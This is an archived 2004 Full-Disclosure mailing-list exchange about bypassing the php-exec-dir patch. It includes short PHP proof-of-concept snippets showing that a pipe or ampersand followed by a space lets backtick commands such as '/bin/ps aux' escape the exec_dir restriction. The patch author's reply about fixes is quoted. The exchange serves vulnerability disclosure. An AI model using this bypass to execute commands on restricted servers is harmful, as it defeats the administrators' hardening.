| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: venom at gen-x.co.nz (VeNoMouS) Subject: RE: php-exec-dir vulnerable after latest upgrade Another way to do this is to replace | with "&" still need space after wards example: <?php $blah = `& /bin/ps aux`; echo nl2br($blah); ?> ----- Original Message ----- From: "VeNoMouS" <venom@...-x.co.nz> To: "C. McCohy" <mccohy@...erdigi.cz>; <full-disclosure@...ts.netsys.com> Sent: Thursday, July 08, 2004 1:05 PM Subject: php-exec-dir vulnerable after latest upgrade > <?php > > $blah = `| /bin/ps aux`; > echo nl2br($blah); > ?> > > ^^ do a |<space>ps exploits it again > > i my exec_dir in php.ini set to /usr/local/lib/php/bin/ with nothing > inside it and i was still able to execute it, you HAVE to do the space > after the pipe '|'. > > > ----- Original Message ----- > From: "C. McCohy" <mccohy@...erdigi.cz> > To: "VeNoMouS" <venom@...-x.co.nz> > Sent: Wednesday, July 07, 2004 9:43 PM > Subject: Re: php-exec-dir vulnerable? > > >> Ok I fixed all patches to all previous and current versions of the patch, >> description can be found on the project homepage >> http://kyberdigi.cz/projects/execdir/ >> >> Please inform all internet groups you have informed about the bug before. >> >> -- >> Baj ... C. McCohy >> >> While you are reading this text, an essential hacking tool >> is being silently installed on your computer. >> >> >> >
Powered by blists - more mailing lists